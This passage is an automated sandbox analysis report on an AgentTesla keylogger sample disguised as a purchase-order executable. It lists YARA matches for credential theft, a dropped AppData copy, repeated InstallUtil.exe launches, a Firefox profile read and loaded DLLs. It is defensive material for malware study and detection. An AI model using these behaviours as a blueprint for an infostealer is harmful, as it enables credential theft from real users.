                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_063345975_2_06334597
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_06333BF85_2_06333BF8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0641DCE85_2_0641DCE8
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_064000405_2_06400040
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_064000065_2_06400006
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeCode function: 5_2_0641D1385_2_0641D138
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_012DD2E08_2_012DD2E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_012D4A608_2_012D4A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_012D9C688_2_012D9C68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_012D3E488_2_012D3E48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_012D41908_2_012D4190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_062E56A88_2_062E56A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_062E00408_2_062E0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_062E2EE88_2_062E2EE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_062E3F208_2_062E3F20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_062EBCC08_2_062EBCC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_062E8B528_2_062E8B52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_062EDBF08_2_062EDBF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_062E361B8_2_062E361B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_062E4FC88_2_062E4FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_063D983D8_2_063D983D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_063DAD808_2_063DAD80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_063DCB908_2_063DCB90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_063D95348_2_063D9534
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_012DD2DA8_2_012DD2DA
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeBinary or memory string: OriginalFilename vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000000.1695366925.00000000003D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLezykyyxwi.exe6 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1747306614.0000000005840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXxrothk.dll" vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1729456286.000000000082E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeBinary or memory string: OriginalFilenameLezykyyxwi.exe6 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeFile created: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeReversingLabs: Detection: 63%
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeVirustotal: Detection: 27%
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeFile read: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe "C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe"
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe "C:\Users\user\AppData\Roaming\Avycqjqvmh.exe"
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe "C:\Users\user\AppData\Roaming\Avycqjqvmh.exe"
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
